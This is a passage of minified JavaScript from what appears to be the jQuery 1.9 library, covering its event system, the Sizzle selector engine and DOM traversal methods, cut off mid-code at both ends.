n.length>u&&s.push({elem:this,handlers:n.slice(u)}),s},fix:function(e){if(e[b.expando])return e;var t,n,r,i=e.type,a=e,s=this.fixHooks[i];s||(this.fixHooks[i]=s=tt.test(i)?this.mouseHooks:et.test(i)?this.keyHooks:{}),r=s.props?this.props.concat(s.props):this.props,e=new b.Event(a),t=r.length;while(t--)n=r[t],e[n]=a[n];return e.target||(e.target=a.srcElement||o),3===e.target.nodeType&&(e.target=e.target.parentNode),e.metaKey=!!e.metaKey,s.filter?s.filter(e,a):e},props:"altKey bubbles cancelable ctrlKey currentTarget eventPhase metaKey relatedTarget shiftKey target timeStamp view which".split(" "),fixHooks:{},keyHooks:{props:"char charCode key keyCode".split(" "),filter:function(e,t){return null==e.which&&(e.which=null!=t.charCode?t.charCode:t.keyCode),e}},mouseHooks:{props:"button buttons clientX clientY fromElement offsetX offsetY pageX pageY screenX screenY toElement".split(" "),filter:function(e,n){var r,i,a,s=n.button,u=n.fromElement;return null==e.pageX&&null!=n.clientX&&(i=e.target.ownerDocument||o,a=i.documentElement,r=i.body,e.pageX=n.clientX+(a&&a.scrollLeft||r&&r.scrollLeft||0)-(a&&a.clientLeft||r&&r.clientLeft||0),e.pageY=n.clientY+(a&&a.scrollTop||r&&r.scrollTop||0)-(a&&a.clientTop||r&&r.clientTop||0)),!e.relatedTarget&&u&&(e.relatedTarget=u===e.target?n.toElement:u),e.which||s===t||(e.which=1&s?1:2&s?3:4&s?2:0),e}},special:{load:{noBubble:!0},click:{trigger:function(){return b.nodeName(this,"input")&&"checkbox"===this.type&&this.click?(this.click(),!1):t}},focus:{trigger:function(){if(this!==o.activeElement&&this.focus)try{return this.focus(),!1}catch(e){}},delegateType:"focusin"},blur:{trigger:function(){return this===o.activeElement&&this.blur?(this.blur(),!1):t},delegateType:"focusout"},beforeunload:{postDispatch:function(e){e.result!==t&&(e.originalEvent.returnValue=e.result)}}},simulate:function(e,t,n,r){var i=b.extend(new b.Event,n,{type:e,isSimulated:!0,originalEvent:{}});r?b.event.trigger(i,null,t):b.event.dispatch.call(t,i),i.isDefaultPrevented()&&n.preventDefault()}},b.removeEvent=o.removeEventListener?function(e,t,n){e.removeEventListener&&e.removeEventListener(t,n,!1)}:function(e,t,n){var r="on"+t;e.detachEvent&&(typeof e[r]===i&&(e[r]=null),e.detachEvent(r,n))},b.Event=function(e,n){return this instanceof b.Event?(e&&e.type?(this.originalEvent=e,this.type=e.type,this.isDefaultPrevented=e.defaultPrevented||e.returnValue===!1||e.getPreventDefault&&e.getPreventDefault()?it:ot):this.type=e,n&&b.extend(this,n),this.timeStamp=e&&e.timeStamp||b.now(),this[b.expando]=!0,t):new b.Event(e,n)},b.Event.prototype={isDefaultPrevented:ot,isPropagationStopped:ot,isImmediatePropagationStopped:ot,preventDefault:function(){var e=this.originalEvent;this.isDefaultPrevented=it,e&&(e.preventDefault?e.preventDefault():e.returnValue=!1)},stopPropagation:function(){var e=this.originalEvent;this.isPropagationStopped=it,e&&(e.stopPropagation&&e.stopPropagation(),e.cancelBubble=!0)},stopImmediatePropagation:function(){this.isImmediatePropagationStopped=it,this.stopPropagation()}},b.each({mouseenter:"mouseover",mouseleave:"mouseout"},function(e,t){b.event.special[e]={delegateType:t,bindType:t,handle:function(e){var n,r=this,i=e.relatedTarget,o=e.handleObj;
	return(!i||i!==r&&!b.contains(r,i))&&(e.type=o.origType,n=o.handler.apply(this,arguments),e.type=t),n}}}),b.support.submitBubbles||(b.event.special.submit={setup:function(){return b.nodeName(this,"form")?!1:(b.event.add(this,"click._submit keypress._submit",function(e){var n=e.target,r=b.nodeName(n,"input")||b.nodeName(n,"button")?n.form:t;r&&!b._data(r,"submitBubbles")&&(b.event.add(r,"submit._submit",function(e){e._submit_bubble=!0}),b._data(r,"submitBubbles",!0))}),t)},postDispatch:function(e){e._submit_bubble&&(delete e._submit_bubble,this.parentNode&&!e.isTrigger&&b.event.simulate("submit",this.parentNode,e,!0))},teardown:function(){return b.nodeName(this,"form")?!1:(b.event.remove(this,"._submit"),t)}}),b.support.changeBubbles||(b.event.special.change={setup:function(){return Z.test(this.nodeName)?(("checkbox"===this.type||"radio"===this.type)&&(b.event.add(this,"propertychange._change",function(e){"checked"===e.originalEvent.propertyName&&(this._just_changed=!0)}),b.event.add(this,"click._change",function(e){this._just_changed&&!e.isTrigger&&(this._just_changed=!1),b.event.simulate("change",this,e,!0)})),!1):(b.event.add(this,"beforeactivate._change",function(e){var t=e.target;Z.test(t.nodeName)&&!b._data(t,"changeBubbles")&&(b.event.add(t,"change._change",function(e){!this.parentNode||e.isSimulated||e.isTrigger||b.event.simulate("change",this.parentNode,e,!0)}),b._data(t,"changeBubbles",!0))}),t)},handle:function(e){var n=e.target;return this!==n||e.isSimulated||e.isTrigger||"radio"!==n.type&&"checkbox"!==n.type?e.handleObj.handler.apply(this,arguments):t},teardown:function(){return b.event.remove(this,"._change"),!Z.test(this.nodeName)}}),b.support.focusinBubbles||b.each({focus:"focusin",blur:"focusout"},function(e,t){var n=0,r=function(e){b.event.simulate(t,e.target,b.event.fix(e),!0)};b.event.special[t]={setup:function(){0===n++&&o.addEventListener(e,r,!0)},teardown:function(){0===--n&&o.removeEventListener(e,r,!0)}}}),b.fn.extend({on:function(e,n,r,i,o){var a,s;if("object"==typeof e){"string"!=typeof n&&(r=r||n,n=t);for(a in e)this.on(a,n,r,e[a],o);return this}if(null==r&&null==i?(i=n,r=n=t):null==i&&("string"==typeof n?(i=r,r=t):(i=r,r=n,n=t)),i===!1)i=ot;else if(!i)return this;return 1===o&&(s=i,i=function(e){return b().off(e),s.apply(this,arguments)},i.guid=s.guid||(s.guid=b.guid++)),this.each(function(){b.event.add(this,e,i,r,n)})},one:function(e,t,n,r){return this.on(e,t,n,r,1)},off:function(e,n,r){var i,o;if(e&&e.preventDefault&&e.handleObj)return i=e.handleObj,b(e.delegateTarget).off(i.namespace?i.origType+"."+i.namespace:i.origType,i.selector,i.handler),this;if("object"==typeof e){for(o in e)this.off(o,n,e[o]);return this}return(n===!1||"function"==typeof n)&&(r=n,n=t),r===!1&&(r=ot),this.each(function(){b.event.remove(this,e,r,n)})},bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,"**"):this.off(t,e||"**",n)},trigger:function(e,t){return this.each(function(){b.event.trigger(e,t,this)})},triggerHandler:function(e,n){var r=this[0];return r?b.event.trigger(e,n,r,!0):t}}),function(e,t){var n,r,i,o,a,s,u,l,c,p,f,d,h,g,m,y,v,x="sizzle"+-new Date,w=e.document,T={},N=0,C=0,k=it(),E=it(),S=it(),A=typeof t,j=1<<31,D=[],L=D.pop,H=D.push,q=D.slice,M=D.indexOf||function(e){var t=0,n=this.length;for(;n>t;t++)if(this[t]===e)return t;return-1},_="[\\x20\\t\\r\\n\\f]",F="(?:\\\\.|[\\w-]|[^\\x00-\\xa0])+",O=F.replace("w","w#"),B="([*^$|!~]?=)",P="\\["+_+"*("+F+")"+_+"*(?:"+B+_+"*(?:(['\"])((?:\\\\.|[^\\\\])*?)\\3|("+O+")|)|)"+_+"*\\]",R=":("+F+")(?:\\(((['\"])((?:\\\\.|[^\\\\])*?)\\3|((?:\\\\.|[^\\\\()[\\]]|"+P.replace(3,8)+")*)|.*)\\)|)",W=RegExp("^"+_+"+|((?:^|[^\\\\])(?:\\\\.)*)"+_+"+$","g"),$=RegExp("^"+_+"*,"+_+"*"),I=RegExp("^"+_+"*([\\x20\\t\\r\\n\\f>+~])"+_+"*"),z=RegExp(R),X=RegExp("^"+O+"$"),U={ID:RegExp("^#("+F+")"),CLASS:RegExp("^\\.("+F+")"),NAME:RegExp("^\\[name=['\"]?("+F+")['\"]?\\]"),TAG:RegExp("^("+F.replace("w","w*")+")"),ATTR:RegExp("^"+P),PSEUDO:RegExp("^"+R),CHILD:RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\("+_+"*(even|odd|(([+-]|)(\\d*)n|)"+_+"*(?:([+-]|)"+_+"*(\\d+)|))"+_+"*\\)|)","i"),needsContext:RegExp("^"+_+"*[>+~]|:(even|odd|eq|gt|lt|nth|first|last)(?:\\("+_+"*((?:-\\d)?\\d*)"+_+"*\\)|)(?=[^-]|$)","i")},V=/[\x20\t\r\n\f]*[+~]/,Y=/^[^{]+\{\s*\[native code/,J=/^(?:#([\w-]+)|(\w+)|\.([\w-]+))$/,G=/^(?:input|select|textarea|button)$/i,Q=/^h\d$/i,K=/'|\\/g,Z=/\=[\x20\t\r\n\f]*([^'"\]]*)[\x20\t\r\n\f]*\]/g,et=/\\([\da-fA-F]{1,6}[\x20\t\r\n\f]?|.)/g,tt=function(e,t){var n="0x"+t-65536;return n!==n?t:0>n?String.fromCharCode(n+65536):String.fromCharCode(55296|n>>10,56320|1023&n)};try{q.call(w.documentElement.childNodes,0)[0].nodeType}catch(nt){q=function(e){var t,n=[];while(t=this[e++])n.push(t);return n}}function rt(e){return Y.test(e+"")}function it(){var e,t=[];return e=function(n,r){return t.push(n+=" ")>i.cacheLength&&delete e[t.shift()],e[n]=r}}function ot(e){return e[x]=!0,e}function at(e){var t=p.createElement("div");try{return e(t)}catch(n){return!1}finally{t=null}}function st(e,t,n,r){var i,o,a,s,u,l,f,g,m,v;if((t?t.ownerDocument||t:w)!==p&&c(t),t=t||p,n=n||[],!e||"string"!=typeof e)return n;if(1!==(s=t.nodeType)&&9!==s)return[];if(!d&&!r){if(i=J.exec(e))if(a=i[1]){if(9===s){if(o=t.getElementById(a),!o||!o.parentNode)return n;if(o.id===a)return n.push(o),n}else if(t.ownerDocument&&(o=t.ownerDocument.getElementById(a))&&y(t,o)&&o.id===a)return n.push(o),n}else{if(i[2])return H.apply(n,q.call(t.getElementsByTagName(e),0)),n;if((a=i[3])&&T.getByClassName&&t.getElementsByClassName)return H.apply(n,q.call(t.getElementsByClassName(a),0)),n}if(T.qsa&&!h.test(e)){if(f=!0,g=x,m=t,v=9===s&&e,1===s&&"object"!==t.nodeName.toLowerCase()){l=ft(e),(f=t.getAttribute("id"))?g=f.replace(K,"\\$&"):t.setAttribute("id",g),g="[id='"+g+"'] ",u=l.length;while(u--)l[u]=g+dt(l[u]);m=V.test(e)&&t.parentNode||t,v=l.join(",")}if(v)try{return H.apply(n,q.call(m.querySelectorAll(v),0)),n}catch(b){}finally{f||t.removeAttribute("id")}}}return wt(e.replace(W,"$1"),t,n,r)}a=st.isXML=function(e){var t=e&&(e.ownerDocument||e).documentElement;return t?"HTML"!==t.nodeName:!1},c=st.setDocument=function(e){var n=e?e.ownerDocument||e:w;return n!==p&&9===n.nodeType&&n.documentElement?(p=n,f=n.documentElement,d=a(n),T.tagNameNoComments=at(function(e){return e.appendChild(n.createComment("")),!e.getElementsByTagName("*").length}),T.attributes=at(function(e){e.innerHTML="<select></select>";var t=typeof e.lastChild.getAttribute("multiple");return"boolean"!==t&&"string"!==t}),T.getByClassName=at(function(e){return e.innerHTML="<div class='hidden e'></div><div class='hidden'></div>",e.getElementsByClassName&&e.getElementsByClassName("e").length?(e.lastChild.className="e",2===e.getElementsByClassName("e").length):!1}),T.getByName=at(function(e){e.id=x+0,e.innerHTML="<a name='"+x+"'></a><div name='"+x+"'></div>",f.insertBefore(e,f.firstChild);var t=n.getElementsByName&&n.getElementsByName(x).length===2+n.getElementsByName(x+0).length;return T.getIdNotName=!n.getElementById(x),f.removeChild(e),t}),i.attrHandle=at(function(e){return e.innerHTML="<a href='#'></a>",e.firstChild&&typeof e.firstChild.getAttribute!==A&&"#"===e.firstChild.getAttribute("href")})?{}:{href:function(e){return e.getAttribute("href",2)},type:function(e){return e.getAttribute("type")}},T.getIdNotName?(i.find.ID=function(e,t){if(typeof t.getElementById!==A&&!d){var n=t.getElementById(e);return n&&n.parentNode?[n]:[]}},i.filter.ID=function(e){var t=e.replace(et,tt);return function(e){return e.getAttribute("id")===t}}):(i.find.ID=function(e,n){if(typeof n.getElementById!==A&&!d){var r=n.getElementById(e);return r?r.id===e||typeof r.getAttributeNode!==A&&r.getAttributeNode("id").value===e?[r]:t:[]}},i.filter.ID=function(e){var t=e.replace(et,tt);return function(e){var n=typeof e.getAttributeNode!==A&&e.getAttributeNode("id");return n&&n.value===t}}),i.find.TAG=T.tagNameNoComments?function(e,n){return typeof n.getElementsByTagName!==A?n.getElementsByTagName(e):t}:function(e,t){var n,r=[],i=0,o=t.getElementsByTagName(e);if("*"===e){while(n=o[i++])1===n.nodeType&&r.push(n);return r}return o},i.find.NAME=T.getByName&&function(e,n){return typeof n.getElementsByName!==A?n.getElementsByName(name):t},i.find.CLASS=T.getByClassName&&function(e,n){return typeof n.getElementsByClassName===A||d?t:n.getElementsByClassName(e)},g=[],h=[":focus"],(T.qsa=rt(n.querySelectorAll))&&(at(function(e){e.innerHTML="<select><option selected=''></option></select>",e.querySelectorAll("[selected]").length||h.push("\\["+_+"*(?:checked|disabled|ismap|multiple|readonly|selected|value)"),e.querySelectorAll(":checked").length||h.push(":checked")}),at(function(e){e.innerHTML="<input type='hidden' i=''/>",e.querySelectorAll("[i^='']").length&&h.push("[*^$]="+_+"*(?:\"\"|'')"),e.querySelectorAll(":enabled").length||h.push(":enabled",":disabled"),e.querySelectorAll("*,:x"),h.push(",.*:")})),(T.matchesSelector=rt(m=f.matchesSelector||f.mozMatchesSelector||f.webkitMatchesSelector||f.oMatchesSelector||f.msMatchesSelector))&&at(function(e){T.disconnectedMatch=m.call(e,"div"),m.call(e,"[s!='']:x"),g.push("!=",R)}),h=RegExp(h.join("|")),g=RegExp(g.join("|")),y=rt(f.contains)||f.compareDocumentPosition?function(e,t){var n=9===e.nodeType?e.documentElement:e,r=t&&t.parentNode;return e===r||!(!r||1!==r.nodeType||!(n.contains?n.contains(r):e.compareDocumentPosition&&16&e.compareDocumentPosition(r)))}:function(e,t){if(t)while(t=t.parentNode)if(t===e)return!0;return!1},v=f.compareDocumentPosition?function(e,t){var r;return e===t?(u=!0,0):(r=t.compareDocumentPosition&&e.compareDocumentPosition&&e.compareDocumentPosition(t))?1&r||e.parentNode&&11===e.parentNode.nodeType?e===n||y(w,e)?-1:t===n||y(w,t)?1:0:4&r?-1:1:e.compareDocumentPosition?-1:1}:function(e,t){var r,i=0,o=e.parentNode,a=t.parentNode,s=[e],l=[t];if(e===t)return u=!0,0;if(!o||!a)return e===n?-1:t===n?1:o?-1:a?1:0;if(o===a)return ut(e,t);r=e;while(r=r.parentNode)s.unshift(r);r=t;while(r=r.parentNode)l.unshift(r);while(s[i]===l[i])i++;return i?ut(s[i],l[i]):s[i]===w?-1:l[i]===w?1:0},u=!1,[0,0].sort(v),T.detectDuplicates=u,p):p},st.matches=function(e,t){return st(e,null,null,t)},st.matchesSelector=function(e,t){if((e.ownerDocument||e)!==p&&c(e),t=t.replace(Z,"='$1']"),!(!T.matchesSelector||d||g&&g.test(t)||h.test(t)))try{var n=m.call(e,t);if(n||T.disconnectedMatch||e.document&&11!==e.document.nodeType)return n}catch(r){}return st(t,p,null,[e]).length>0},st.contains=function(e,t){return(e.ownerDocument||e)!==p&&c(e),y(e,t)},st.attr=function(e,t){var n;return(e.ownerDocument||e)!==p&&c(e),d||(t=t.toLowerCase()),(n=i.attrHandle[t])?n(e):d||T.attributes?e.getAttribute(t):((n=e.getAttributeNode(t))||e.getAttribute(t))&&e[t]===!0?t:n&&n.specified?n.value:null},st.error=function(e){throw Error("Syntax error, unrecognized expression: "+e)},st.uniqueSort=function(e){var t,n=[],r=1,i=0;if(u=!T.detectDuplicates,e.sort(v),u){for(;t=e[r];r++)t===e[r-1]&&(i=n.push(r));while(i--)e.splice(n[i],1)}return e};function ut(e,t){var n=t&&e,r=n&&(~t.sourceIndex||j)-(~e.sourceIndex||j);if(r)return r;if(n)while(n=n.nextSibling)if(n===t)return-1;return e?1:-1}function lt(e){return function(t){var n=t.nodeName.toLowerCase();return"input"===n&&t.type===e}}function ct(e){return function(t){var n=t.nodeName.toLowerCase();return("input"===n||"button"===n)&&t.type===e}}function pt(e){return ot(function(t){return t=+t,ot(function(n,r){var i,o=e([],n.length,t),a=o.length;while(a--)n[i=o[a]]&&(n[i]=!(r[i]=n[i]))})})}o=st.getText=function(e){var t,n="",r=0,i=e.nodeType;if(i){if(1===i||9===i||11===i){if("string"==typeof e.textContent)return e.textContent;for(e=e.firstChild;e;e=e.nextSibling)n+=o(e)}else if(3===i||4===i)return e.nodeValue}else for(;t=e[r];r++)n+=o(t);return n},i=st.selectors={cacheLength:50,createPseudo:ot,match:U,find:{},relative:{">":{dir:"parentNode",first:!0}," ":{dir:"parentNode"},"+":{dir:"previousSibling",first:!0},"~":{dir:"previousSibling"}},preFilter:{ATTR:function(e){return e[1]=e[1].replace(et,tt),e[3]=(e[4]||e[5]||"").replace(et,tt),"~="===e[2]&&(e[3]=" "+e[3]+" "),e.slice(0,4)},CHILD:function(e){return e[1]=e[1].toLowerCase(),"nth"===e[1].slice(0,3)?(e[3]||st.error(e[0]),e[4]=+(e[4]?e[5]+(e[6]||1):2*("even"===e[3]||"odd"===e[3])),e[5]=+(e[7]+e[8]||"odd"===e[3])):e[3]&&st.error(e[0]),e},PSEUDO:function(e){var t,n=!e[5]&&e[2];return U.CHILD.test(e[0])?null:(e[4]?e[2]=e[4]:n&&z.test(n)&&(t=ft(n,!0))&&(t=n.indexOf(")",n.length-t)-n.length)&&(e[0]=e[0].slice(0,t),e[2]=n.slice(0,t)),e.slice(0,3))}},filter:{TAG:function(e){return"*"===e?function(){return!0}:(e=e.replace(et,tt).toLowerCase(),function(t){return t.nodeName&&t.nodeName.toLowerCase()===e})},CLASS:function(e){var t=k[e+" "];return t||(t=RegExp("(^|"+_+")"+e+"("+_+"|$)"))&&k(e,function(e){return t.test(e.className||typeof e.getAttribute!==A&&e.getAttribute("class")||"")})},ATTR:function(e,t,n){return function(r){var i=st.attr(r,e);return null==i?"!="===t:t?(i+="","="===t?i===n:"!="===t?i!==n:"^="===t?n&&0===i.indexOf(n):"*="===t?n&&i.indexOf(n)>-1:"$="===t?n&&i.slice(-n.length)===n:"~="===t?(" "+i+" ").indexOf(n)>-1:"|="===t?i===n||i.slice(0,n.length+1)===n+"-":!1):!0}},CHILD:function(e,t,n,r,i){var o="nth"!==e.slice(0,3),a="last"!==e.slice(-4),s="of-type"===t;return 1===r&&0===i?function(e){return!!e.parentNode}:function(t,n,u){var l,c,p,f,d,h,g=o!==a?"nextSibling":"previousSibling",m=t.parentNode,y=s&&t.nodeName.toLowerCase(),v=!u&&!s;if(m){if(o){while(g){p=t;while(p=p[g])if(s?p.nodeName.toLowerCase()===y:1===p.nodeType)return!1;h=g="only"===e&&!h&&"nextSibling"}return!0}if(h=[a?m.firstChild:m.lastChild],a&&v){c=m[x]||(m[x]={}),l=c[e]||[],d=l[0]===N&&l[1],f=l[0]===N&&l[2],p=d&&m.childNodes[d];while(p=++d&&p&&p[g]||(f=d=0)||h.pop())if(1===p.nodeType&&++f&&p===t){c[e]=[N,d,f];break}}else if(v&&(l=(t[x]||(t[x]={}))[e])&&l[0]===N)f=l[1];else while(p=++d&&p&&p[g]||(f=d=0)||h.pop())if((s?p.nodeName.toLowerCase()===y:1===p.nodeType)&&++f&&(v&&((p[x]||(p[x]={}))[e]=[N,f]),p===t))break;return f-=i,f===r||0===f%r&&f/r>=0}}},PSEUDO:function(e,t){var n,r=i.pseudos[e]||i.setFilters[e.toLowerCase()]||st.error("unsupported pseudo: "+e);return r[x]?r(t):r.length>1?(n=[e,e,"",t],i.setFilters.hasOwnProperty(e.toLowerCase())?ot(function(e,n){var i,o=r(e,t),a=o.length;while(a--)i=M.call(e,o[a]),e[i]=!(n[i]=o[a])}):function(e){return r(e,0,n)}):r}},pseudos:{not:ot(function(e){var t=[],n=[],r=s(e.replace(W,"$1"));return r[x]?ot(function(e,t,n,i){var o,a=r(e,null,i,[]),s=e.length;while(s--)(o=a[s])&&(e[s]=!(t[s]=o))}):function(e,i,o){return t[0]=e,r(t,null,o,n),!n.pop()}}),has:ot(function(e){return function(t){return st(e,t).length>0}}),contains:ot(function(e){return function(t){return(t.textContent||t.innerText||o(t)).indexOf(e)>-1}}),lang:ot(function(e){return X.test(e||"")||st.error("unsupported lang: "+e),e=e.replace(et,tt).toLowerCase(),function(t){var n;do if(n=d?t.getAttribute("xml:lang")||t.getAttribute("lang"):t.lang)return n=n.toLowerCase(),n===e||0===n.indexOf(e+"-");while((t=t.parentNode)&&1===t.nodeType);return!1}}),target:function(t){var n=e.location&&e.location.hash;return n&&n.slice(1)===t.id},root:function(e){return e===f},focus:function(e){return e===p.activeElement&&(!p.hasFocus||p.hasFocus())&&!!(e.type||e.href||~e.tabIndex)},enabled:function(e){return e.disabled===!1},disabled:function(e){return e.disabled===!0},checked:function(e){var t=e.nodeName.toLowerCase();return"input"===t&&!!e.checked||"option"===t&&!!e.selected},selected:function(e){return e.parentNode&&e.parentNode.selectedIndex,e.selected===!0},empty:function(e){for(e=e.firstChild;e;e=e.nextSibling)if(e.nodeName>"@"||3===e.nodeType||4===e.nodeType)return!1;return!0},parent:function(e){return!i.pseudos.empty(e)},header:function(e){return Q.test(e.nodeName)},input:function(e){return G.test(e.nodeName)},button:function(e){var t=e.nodeName.toLowerCase();return"input"===t&&"button"===e.type||"button"===t},text:function(e){var t;return"input"===e.nodeName.toLowerCase()&&"text"===e.type&&(null==(t=e.getAttribute("type"))||t.toLowerCase()===e.type)},first:pt(function(){return[0]}),last:pt(function(e,t){return[t-1]}),eq:pt(function(e,t,n){return[0>n?n+t:n]}),even:pt(function(e,t){var n=0;for(;t>n;n+=2)e.push(n);return e}),odd:pt(function(e,t){var n=1;for(;t>n;n+=2)e.push(n);return e}),lt:pt(function(e,t,n){var r=0>n?n+t:n;for(;--r>=0;)e.push(r);return e}),gt:pt(function(e,t,n){var r=0>n?n+t:n;for(;t>++r;)e.push(r);return e})}};for(n in{radio:!0,checkbox:!0,file:!0,password:!0,image:!0})i.pseudos[n]=lt(n);for(n in{submit:!0,reset:!0})i.pseudos[n]=ct(n);function ft(e,t){var n,r,o,a,s,u,l,c=E[e+" "];if(c)return t?0:c.slice(0);s=e,u=[],l=i.preFilter;while(s){(!n||(r=$.exec(s)))&&(r&&(s=s.slice(r[0].length)||s),u.push(o=[])),n=!1,(r=I.exec(s))&&(n=r.shift(),o.push({value:n,type:r[0].replace(W," ")}),s=s.slice(n.length));for(a in i.filter)!(r=U[a].exec(s))||l[a]&&!(r=l[a](r))||(n=r.shift(),o.push({value:n,type:a,matches:r}),s=s.slice(n.length));if(!n)break}return t?s.length:s?st.error(e):E(e,u).slice(0)}function dt(e){var t=0,n=e.length,r="";for(;n>t;t++)r+=e[t].value;return r}function ht(e,t,n){var i=t.dir,o=n&&"parentNode"===i,a=C++;return t.first?function(t,n,r){while(t=t[i])if(1===t.nodeType||o)return e(t,n,r)}:function(t,n,s){var u,l,c,p=N+" "+a;if(s){while(t=t[i])if((1===t.nodeType||o)&&e(t,n,s))return!0}else while(t=t[i])if(1===t.nodeType||o)if(c=t[x]||(t[x]={}),(l=c[i])&&l[0]===p){if((u=l[1])===!0||u===r)return u===!0}else if(l=c[i]=[p],l[1]=e(t,n,s)||r,l[1]===!0)return!0}}function gt(e){return e.length>1?function(t,n,r){var i=e.length;while(i--)if(!e[i](t,n,r))return!1;return!0}:e[0]}function mt(e,t,n,r,i){var o,a=[],s=0,u=e.length,l=null!=t;for(;u>s;s++)(o=e[s])&&(!n||n(o,r,i))&&(a.push(o),l&&t.push(s));return a}function yt(e,t,n,r,i,o){return r&&!r[x]&&(r=yt(r)),i&&!i[x]&&(i=yt(i,o)),ot(function(o,a,s,u){var l,c,p,f=[],d=[],h=a.length,g=o||xt(t||"*",s.nodeType?[s]:s,[]),m=!e||!o&&t?g:mt(g,f,e,s,u),y=n?i||(o?e:h||r)?[]:a:m;if(n&&n(m,y,s,u),r){l=mt(y,d),r(l,[],s,u),c=l.length;while(c--)(p=l[c])&&(y[d[c]]=!(m[d[c]]=p))}if(o){if(i||e){if(i){l=[],c=y.length;while(c--)(p=y[c])&&l.push(m[c]=p);i(null,y=[],l,u)}c=y.length;while(c--)(p=y[c])&&(l=i?M.call(o,p):f[c])>-1&&(o[l]=!(a[l]=p))}}else y=mt(y===a?y.splice(h,y.length):y),i?i(null,a,y,u):H.apply(a,y)})}function vt(e){var t,n,r,o=e.length,a=i.relative[e[0].type],s=a||i.relative[" "],u=a?1:0,c=ht(function(e){return e===t},s,!0),p=ht(function(e){return M.call(t,e)>-1},s,!0),f=[function(e,n,r){return!a&&(r||n!==l)||((t=n).nodeType?c(e,n,r):p(e,n,r))}];for(;o>u;u++)if(n=i.relative[e[u].type])f=[ht(gt(f),n)];else{if(n=i.filter[e[u].type].apply(null,e[u].matches),n[x]){for(r=++u;o>r;r++)if(i.relative[e[r].type])break;return yt(u>1&&gt(f),u>1&&dt(e.slice(0,u-1)).replace(W,"$1"),n,r>u&&vt(e.slice(u,r)),o>r&&vt(e=e.slice(r)),o>r&&dt(e))}f.push(n)}return gt(f)}function bt(e,t){var n=0,o=t.length>0,a=e.length>0,s=function(s,u,c,f,d){var h,g,m,y=[],v=0,b="0",x=s&&[],w=null!=d,T=l,C=s||a&&i.find.TAG("*",d&&u.parentNode||u),k=N+=null==T?1:Math.random()||.1;for(w&&(l=u!==p&&u,r=n);null!=(h=C[b]);b++){if(a&&h){g=0;while(m=e[g++])if(m(h,u,c)){f.push(h);break}w&&(N=k,r=++n)}o&&((h=!m&&h)&&v--,s&&x.push(h))}if(v+=b,o&&b!==v){g=0;while(m=t[g++])m(x,y,u,c);if(s){if(v>0)while(b--)x[b]||y[b]||(y[b]=L.call(f));y=mt(y)}H.apply(f,y),w&&!s&&y.length>0&&v+t.length>1&&st.uniqueSort(f)}return w&&(N=k,l=T),x};return o?ot(s):s}s=st.compile=function(e,t){var n,r=[],i=[],o=S[e+" "];if(!o){t||(t=ft(e)),n=t.length;while(n--)o=vt(t[n]),o[x]?r.push(o):i.push(o);o=S(e,bt(i,r))}return o};function xt(e,t,n){var r=0,i=t.length;for(;i>r;r++)st(e,t[r],n);return n}function wt(e,t,n,r){var o,a,u,l,c,p=ft(e);if(!r&&1===p.length){if(a=p[0]=p[0].slice(0),a.length>2&&"ID"===(u=a[0]).type&&9===t.nodeType&&!d&&i.relative[a[1].type]){if(t=i.find.ID(u.matches[0].replace(et,tt),t)[0],!t)return n;e=e.slice(a.shift().value.length)}o=U.needsContext.test(e)?0:a.length;while(o--){if(u=a[o],i.relative[l=u.type])break;if((c=i.find[l])&&(r=c(u.matches[0].replace(et,tt),V.test(a[0].type)&&t.parentNode||t))){if(a.splice(o,1),e=r.length&&dt(a),!e)return H.apply(n,q.call(r,0)),n;break}}}return s(e,p)(r,t,d,n,V.test(e)),n}i.pseudos.nth=i.pseudos.eq;function Tt(){}i.filters=Tt.prototype=i.pseudos,i.setFilters=new Tt,c(),st.attr=b.attr,b.find=st,b.expr=st.selectors,b.expr[":"]=b.expr.pseudos,b.unique=st.uniqueSort,b.text=st.getText,b.isXMLDoc=st.isXML,b.contains=st.contains}(e);var at=/Until$/,st=/^(?:parents|prev(?:Until|All))/,ut=/^.[^:#\[\.,]*$/,lt=b.expr.match.needsContext,ct={children:!0,contents:!0,next:!0,prev:!0};b.fn.extend({find:function(e){var t,n,r,i=this.length;if("string"!=typeof e)return r=this,this.pushStack(b(e).filter(function(){for(t=0;i>t;t++)if(b.contains(r[t],this))return!0}));for(n=[],t=0;i>t;t++)b.find(e,this[t],n);return n=this.pushStack(i>1?b.unique(n):n),n.selector=(this.selector?this.selector+" ":"")+e,n},has:function(e){var t,n=b(e,this),r=n.length;return this.filter(function(){for(t=0;r>t;t++)if(b.contains(this,n[t]))return!0})},not:function(e){return this.pushStack(ft(this,e,!1))},filter:function(e){return this.pushStack(ft(this,e,!0))},is:function(e){return!!e&&("string"==typeof e?lt.test(e)?b(e,this.context).index(this[0])>=0:b.filter(e,this).length>0:this.filter(e).length>0)},closest:function(e,t){var n,r=0,i=this.length,o=[],a=lt.test(e)||"string"!=typeof e?b(e,t||this.context):0;for(;i>r;r++){n=this[r];while(n&&n.ownerDocument&&n!==t&&11!==n.nodeType){if(a?a.index(n)>-1:b.find.matchesSelector(n,e)){o.push(n);break}n=n.parentNode}}return this.pushStack(o.length>1?b.unique(o):o)},index:function(e){return e?"string"==typeof e?b.inArray(this[0],b(e)):b.inArray(e.jquery?e[0]:e,this):this[0]&&this[0].parentNode?this.first().prevAll().length:-1},add:function(e,t){var n="string"==typeof e?b(e,t):b.makeArray(e&&e.nodeType?[e]:e),r=b.merge(this.get(),n);return this.pushStack(b.unique(r))},addBack:function(e){return this.add(null==e?this.prevObject:this.prevObject.filter(e))}}),b.fn.andSelf=b.fn.addBack;function pt(e,t){do e=e[t];while(e&&1!==e.nodeType);return e}b.each({parent:function(e){var t=e.parentNode;return t&&11!==t.nodeType?t:null},parents:function(e){return b.dir(e,"parentNode")},parentsUntil:function(e,t,n){return b.dir(e,"parentNode",n)},next:function(e){return pt(e,"nextSibling")},prev:function(e){return pt(e,"previousSibling")},nextAll:function(e){return b.dir(e,"nextSibling")},prevAll:function(e){return b.dir(e,"previousSibling")},nextUntil:function(e,t,n){return b.dir(e,"nextSibling",n)},prevUntil:function(e,t,n){return b.dir(e,"previousSibling",n)},siblings:function(e){return b.sibling((e.parentNode||{}).firstChild,e)},children:function(e){return b.sibling(e.firstChild)},contents:function(e){return b.nodeName(e,"iframe")?e.contentDocument||e.contentWindow.document:b.merge([],e.childNodes)}},function(e,t){b.fn[e]=function(n,r){var i=b.map(this,t,n);return 